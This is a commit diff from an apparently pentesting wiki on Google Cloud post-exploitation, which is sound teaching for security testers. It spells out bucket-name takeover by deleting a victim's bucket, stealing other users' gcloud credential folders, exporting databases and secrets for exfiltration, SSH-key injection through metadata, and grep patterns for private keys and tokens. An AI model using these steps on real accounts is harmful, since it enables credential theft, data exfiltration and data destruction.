GitBook: [#2802] gcp up

This commit is contained in:
CPol 2021-10-25 14:05:48 +00:00 committed by gitbook-bot
parent 8d35569d90
commit 13ec8f13cb
7 changed files with 210 additions and 113 deletions

View File

@ -507,6 +507,7 @@
* [GCP - Compute Enumeration](cloud-security/gcp-security/gcp-compute-enumeration.md)
* [GCP - Network Enumeration](cloud-security/gcp-security/gcp-network-enumeration.md)
* [GCP - KMS & Secrets Management Enumeration](cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md)
* [GCP - Databases](cloud-security/gcp-security/gcp-databases.md)
## Physical attacks

View File

@ -1,6 +1,4 @@
# GCP - Buckets Brute-Force & Privilege Escalation
## Brute-Force
As with other clouds, GCP also offers buckets to its users. These buckets might be publicly accessible (to list the content, read, write...).
@ -31,37 +29,6 @@ gsutil iam ch group:allAuthenticatedUsers:admin gs://BUCKET_NAME
One of the main attractions to escalating from a LegacyBucketOwner to Storage Admin is the ability to use the “storage.buckets.delete” privilege. In theory, you could **delete the bucket after escalating your privileges, then you could create the bucket in your own account to steal the name**.
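A minimal sketch of that takeover, assuming you already escalated to Storage Admin in the victim project (`[BUCKET_NAME]` and `[YOUR_PROJECT]` are placeholders):
```bash
# Empty and delete the victim bucket (rm -r also removes the bucket itself)
gsutil rm -r gs://[BUCKET_NAME]
# Re-create the bucket from a project you control to steal the name
gsutil mb -p [YOUR_PROJECT] gs://[BUCKET_NAME]
```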
## Authenticated Enumeration
Default configurations permit read access to storage. This means that you may **enumerate ALL storage buckets in the project**, including **listing** and **accessing** the contents inside.
This can be a MAJOR vector for privilege escalation, as those buckets can contain secrets.
The following commands will help you explore this vector:
```bash
# List all storage buckets in project
gsutil ls
# Get detailed info on all buckets in project
gsutil ls -L
# List contents of a specific bucket (recursive, so careful!)
gsutil ls -r gs://bucket-name/
# Cat the contents of a file without copying it locally
gsutil cat gs://bucket-name/folder/object
# Copy an object from the bucket to your local storage for review
gsutil cp gs://bucket-name/folder/object ~/
```
If you get a permission denied error when listing buckets, you may still have access to their contents. Now that you know the naming convention of the buckets, you can generate a list of possible names and try to access them:
```bash
for i in $(cat wordlist.txt); do gsutil ls -r gs://"$i"; done
```
## References
* [https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/](https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/)

View File

@ -1,4 +1,4 @@
# GCP - Compute & Network Enumeration
## Compute instances
@ -72,13 +72,24 @@ You can then [export](https://cloud.google.com/sdk/gcloud/reference/compute/imag
$ gcloud compute images list --no-standard-images
```
### Local Privilege Escalation and Pivoting
If you compromise a compute instance, you should also check the actions mentioned in this page:
{% content-ref url="gcp-local-privilege-escalation-ssh-pivoting.md" %}
[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md)
{% endcontent-ref %}
### **Steal gcloud authorizations**
It's quite possible that **other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this.
First, find what `gcloud` config directories exist in users' home folders.
```bash
sudo find / -name "gcloud" 2>/dev/null
```
You can manually inspect the files inside, but these are generally the ones with the secrets:
* `~/.config/gcloud/credentials.db`
* `~/.config/gcloud/legacy_credentials/[ACCOUNT]/adc.json`
* `~/.config/gcloud/legacy_credentials/[ACCOUNT]/.boto`
* `~/.credentials.json`
Now, you have the option of looking for clear text credentials in these files or simply copying the entire `gcloud` folder to a machine you control and running `gcloud auth list` to see what accounts are now available to you.
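As a sketch of the second option (the victim's home directory and the destination path are assumptions):
```bash
# On the compromised box (as root): pack the user's gcloud config
tar czf /tmp/gcloud-conf.tgz -C /home/[USER]/.config gcloud
# On your machine, after exfiltrating the archive:
mkdir -p ~/stolen && tar xzf gcloud-conf.tgz -C ~/stolen
# Point gcloud at the stolen config and list the available accounts
CLOUDSDK_CONFIG=~/stolen/gcloud gcloud auth list
```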
## Images

View File

@ -0,0 +1,59 @@
# GCP - Databases
Google has [a handful of database technologies](https://cloud.google.com/products/databases/) that you may have access to via the default service account or another set of credentials you have compromised thus far.
Databases will usually contain interesting information, so it is highly recommended to check them. Each database type provides various **`gcloud` commands to export the data**. This typically involves **writing the database to a cloud storage bucket first**, which you can then download. It may be best to use an existing bucket you already have access to, but you can also create your own if you want.
As an example, you can follow [Google's documentation](https://cloud.google.com/sql/docs/mysql/import-export/exporting) to exfiltrate a Cloud SQL database.
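Following that documentation, a Cloud SQL exfiltration could look like the sketch below (instance, database and bucket names are placeholders; note the instance's service account needs write access to the bucket):
```bash
# Dump a database from the instance into a bucket you can read
gcloud sql export sql [INSTANCE] gs://[BUCKET]/dump.sql --database=[DATABASE]
# Download the dump locally
gsutil cp gs://[BUCKET]/dump.sql .
```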
### [Cloud SQL](https://cloud.google.com/sdk/gcloud/reference/sql/)
Cloud SQL instances are **fully managed, relational MySQL, PostgreSQL and SQL Server databases**. Google handles replication, patch management and database management to ensure availability and performance. [Learn more](https://cloud.google.com/sql/docs/).
```bash
# Cloud SQL
gcloud sql instances list
gcloud sql databases list --instance [INSTANCE]
gcloud sql backups list --instance [INSTANCE]
```
### [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/)
Fully managed relational database with unlimited scale, strong consistency, and up to 99.999% availability.
```bash
# Cloud Spanner
gcloud spanner instances list
gcloud spanner databases list --instance [INSTANCE]
gcloud spanner backups list --instance [INSTANCE]
```
### [Cloud Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/)
A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable).
```bash
# Cloud Bigtable
gcloud bigtable instances list
gcloud bigtable clusters list
gcloud bigtable backups list --instance [INSTANCE]
```
### [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/)
Cloud Firestore is a flexible, scalable database for mobile, web, and server development from Firebase and Google Cloud. Like Firebase Realtime Database, it keeps your data in sync across client apps through realtime listeners and offers offline support for mobile and web so you can build responsive apps that work regardless of network latency or Internet connectivity. Cloud Firestore also offers seamless integration with other Firebase and Google Cloud products, including Cloud Functions. [Learn more](https://firebase.google.com/docs/firestore).
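A minimal enumeration sketch (the bucket name is a placeholder, and `gcloud firestore export` assumes a bucket you can write to):
```bash
# Cloud Firestore
# Composite indexes can hint at interesting collection names
gcloud firestore indexes composite list
# Export the whole database to a bucket you control / can read
gcloud firestore export gs://[BUCKET]
```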
Other database references:
* [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/)
* [Firebase](https://cloud.google.com/sdk/gcloud/reference/firebase/)
* There are more database products not covered here

View File

@ -29,7 +29,7 @@ When using a custom service account, **one** of the following IAM permissions **
* `compute.instances.setMetadata` (to affect a single instance)
* `compute.projects.setCommonInstanceMetadata` (to affect all instances in the project)
Although Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts#associating_a_service_account_to_an_instance) not using access scopes for custom service accounts, it is still possible to do so. You'll need one of the following **access scopes**:
* `https://www.googleapis.com/auth/compute`
* `https://www.googleapis.com/auth/cloud-platform`
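From inside an instance you can check which scopes the attached service account actually has by querying the metadata server (no authentication needed):
```bash
# Token scopes of the default service account, straight from the metadata server
curl -s -H "Metadata-Flavor: Google" \
    "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes"
```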
@ -46,7 +46,7 @@ So, if you can **modify custom instance metadata** with your service account, yo
### **Add SSH key to existing privileged user**
Let's start by adding our own key to an existing account, as that will probably make the least noise.
**Check the instance for existing SSH keys**. Pick one of these users as they are likely to have sudo rights.
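If you are already inside the instance, one way to check is to read the `ssh-keys` metadata entries directly:
```bash
# Instance-level SSH keys
curl -s -H "Metadata-Flavor: Google" \
    "http://metadata.google.internal/computeMetadata/v1/instance/attributes/ssh-keys"
# Project-level SSH keys (applied to all instances)
curl -s -H "Metadata-Flavor: Google" \
    "http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys"
```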
@ -139,7 +139,7 @@ This will **generate a new SSH key, add it to your existing user, and add your e
[OS Login](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances.
OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`.
OS Login with two-factor authentication is [enabled](https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication) in the same manner with the metadata key of `enable-oslogin-2fa = TRUE`.
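For reference, this is roughly how those keys are set (instance name and zone are placeholders):
```bash
# Enable OS Login on a single instance
gcloud compute instances add-metadata [INSTANCE] --zone [ZONE] \
    --metadata enable-oslogin=TRUE
# Or across the whole project
gcloud compute project-info add-metadata --metadata enable-oslogin=TRUE
```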
@ -150,7 +150,7 @@ The following two **IAM permissions control SSH access to instances with OS Logi
Unlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted.
If your service account has these permissions, **you can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa_ssh_manual). **Two-factor** is **only** enforced when using **user accounts**, so that should not slow you down even if it is assigned as shown above.
Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network.
@ -165,56 +165,3 @@ gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt
```
If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes.
## Search for Keys in the filesystem
It's quite possible that **other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this.
First, find what `gcloud` config directories exist in users' home folders.
```bash
sudo find / -name "gcloud" 2>/dev/null
```
You can manually inspect the files inside, but these are generally the ones with the secrets:
* `~/.config/gcloud/credentials.db`
* `~/.config/gcloud/legacy_credentials/[ACCOUNT]/adc.json`
* `~/.config/gcloud/legacy_credentials/[ACCOUNT]/.boto`
* `~/.credentials.json`
Now, you have the option of looking for clear text credentials in these files or simply copying the entire `gcloud` folder to a machine you control and running `gcloud auth list` to see what accounts are now available to you.
### More API key regexes
```bash
TARGET_DIR="/path/to/whatever"
# Service account keys
grep -Pzr "(?s){[^{}]*?service_account[^{}]*?private_key.*?}" \
"$TARGET_DIR"
# Legacy GCP creds
grep -Pzr "(?s){[^{}]*?client_id[^{}]*?client_secret.*?}" \
"$TARGET_DIR"
# Google API keys
grep -Pr "AIza[a-zA-Z0-9\\-_]{35}" \
"$TARGET_DIR"
# Google OAuth tokens
grep -Pr "ya29\.[a-zA-Z0-9_-]{100,200}" \
"$TARGET_DIR"
# Generic SSH keys
grep -Pzr "(?s)-----BEGIN[ A-Z]*?PRIVATE KEY[a-zA-Z0-9/\+=\n-]*?END[ A-Z]*?PRIVATE KEY-----" \
"$TARGET_DIR"
# Signed storage URLs
grep -Pir "storage.googleapis.com.*?Goog-Signature=[a-f0-9]+" \
"$TARGET_DIR"
# Signed policy documents in HTML
grep -Pzr '(?s)<form action.*?googleapis.com.*?name="signature" value=".*?">' \
"$TARGET_DIR"
```

View File

@ -1,5 +1,85 @@
# GCP - Looting
## Databases
Google has [a handful of database technologies](https://cloud.google.com/products/databases/) that you may have access to via the default service account or another set of credentials you have compromised thus far.
Databases will usually contain interesting information, so it is highly recommended to check them. Each database type provides various **`gcloud` commands to export the data**. This typically involves **writing the database to a cloud storage bucket first**, which you can then download. It may be best to use an existing bucket you already have access to, but you can also create your own if you want.
As an example, you can follow [Google's documentation](https://cloud.google.com/sql/docs/mysql/import-export/exporting) to exfiltrate a Cloud SQL database.
* [Cloud SQL](https://cloud.google.com/sdk/gcloud/reference/sql/)
* [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/)
* [Cloud Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/)
* [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/)
* [Firebase](https://cloud.google.com/sdk/gcloud/reference/firebase/)
* There are more databases
```bash
# Cloud SQL
$ gcloud sql instances list
$ gcloud sql databases list --instance [INSTANCE]
# Cloud Spanner
$ gcloud spanner instances list
$ gcloud spanner databases list --instance [INSTANCE]
# Cloud Bigtable
$ gcloud bigtable instances list
```
## Storage Buckets
Default configurations permit read access to storage. This means that you may **enumerate ALL storage buckets in the project**, including **listing** and **accessing** the contents inside.
This can be a MAJOR vector for privilege escalation, as those buckets can contain secrets.
The following commands will help you explore this vector:
```bash
# List all storage buckets in project
gsutil ls
# Get detailed info on all buckets in project
gsutil ls -L
# List contents of a specific bucket (recursive, so careful!)
gsutil ls -r gs://bucket-name/
# Cat the contents of a file without copying it locally
gsutil cat gs://bucket-name/folder/object
# Copy an object from the bucket to your local storage for review
gsutil cp gs://bucket-name/folder/object ~/
```
If you get a permission denied error when listing buckets, you may still have access to their contents. Now that you know the naming convention of the buckets, you can generate a list of possible names and try to access them:
```bash
for i in $(cat wordlist.txt); do gsutil ls -r gs://"$i"; done
```
## Crypto Keys
[Cloud Key Management Service](https://cloud.google.com/kms/docs/) is a repository for storing cryptographic keys, such as those used to **encrypt and decrypt sensitive files**. Individual keys are stored in key rings, and granular permissions can be applied at either level.
If you have **permissions to list the keys**, this is how you can access them:
```bash
# List the global keyrings available
gcloud kms keyrings list --location global
# List the keys inside a keyring
gcloud kms keys list --keyring [KEYRING NAME] --location global
# Decrypt a file using one of your keys
gcloud kms decrypt --ciphertext-file=[INFILE] \
--plaintext-file=[OUTFILE] \
--key [KEY] \
--keyring [KEYRING] \
--location global
```
## Custom Metadata
Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the instance and project level. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts.
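From inside an instance those key/value pairs can be read straight from the metadata server, as in this quick sketch:
```bash
# List custom instance-level metadata keys
curl -s -H "Metadata-Flavor: Google" \
    "http://metadata.google.internal/computeMetadata/v1/instance/attributes/"
# List custom project-level metadata keys
curl -s -H "Metadata-Flavor: Google" \
    "http://metadata.google.internal/computeMetadata/v1/project/attributes/"
```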
@ -169,6 +249,54 @@ kubectl cluster-info
You can read more about `gcloud` for containers [here](https://cloud.google.com/sdk/gcloud/reference/container/).
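A short enumeration sketch using those commands (cluster name and zone are placeholders):
```bash
# List the GKE clusters visible to your credentials
gcloud container clusters list
# Fetch kubeconfig credentials for a cluster, then pivot to kubectl
gcloud container clusters get-credentials [CLUSTER] --zone [ZONE]
kubectl cluster-info
```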
## Secrets Management
Google [Secrets Management](https://cloud.google.com/solutions/secrets-management/) is a vault-like solution for storing passwords, API keys, certificates, and other sensitive data. As of this writing, it is currently in beta.
```bash
# First, list the entries
gcloud beta secrets list
# Then, pull the clear-text of any secret
gcloud beta secrets versions access 1 --secret="[SECRET NAME]"
```
Note that changing a secret entry will create a new version, so it's worth changing the `1` in the command above to a `2` and so on.
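Rather than guessing version numbers, you can also list them (a sketch with the same placeholder name):
```bash
# List all versions of a given secret
gcloud beta secrets versions list "[SECRET NAME]"
```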
## Search Local Secrets
```bash
TARGET_DIR="/path/to/whatever"
# Service account keys
grep -Pzr "(?s){[^{}]*?service_account[^{}]*?private_key.*?}" \
"$TARGET_DIR"
# Legacy GCP creds
grep -Pzr "(?s){[^{}]*?client_id[^{}]*?client_secret.*?}" \
"$TARGET_DIR"
# Google API keys
grep -Pr "AIza[a-zA-Z0-9\\-_]{35}" \
"$TARGET_DIR"
# Google OAuth tokens
grep -Pr "ya29\.[a-zA-Z0-9_-]{100,200}" \
"$TARGET_DIR"
# Generic SSH keys
grep -Pzr "(?s)-----BEGIN[ A-Z]*?PRIVATE KEY[a-zA-Z0-9/\+=\n-]*?END[ A-Z]*?PRIVATE KEY-----" \
"$TARGET_DIR"
# Signed storage URLs
grep -Pir "storage.googleapis.com.*?Goog-Signature=[a-f0-9]+" \
"$TARGET_DIR"
# Signed policy documents in HTML
grep -Pzr '(?s)<form action.*?googleapis.com.*?name="signature" value=".*?">' \
"$TARGET_DIR"
```
## References
* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)

View File

@ -1,19 +1,3 @@
# GCP - Network Enumeration
## Network Enumeration
### Compute
```bash
# List networks
gcloud compute networks list
gcloud compute networks describe <network>
# List subnetworks
gcloud compute networks subnets list
gcloud compute networks subnets get-iam-policy <name> --region <region>
gcloud compute networks subnets describe <name> --region <region>
# List FW rules in networks
gcloud compute firewall-rules list
```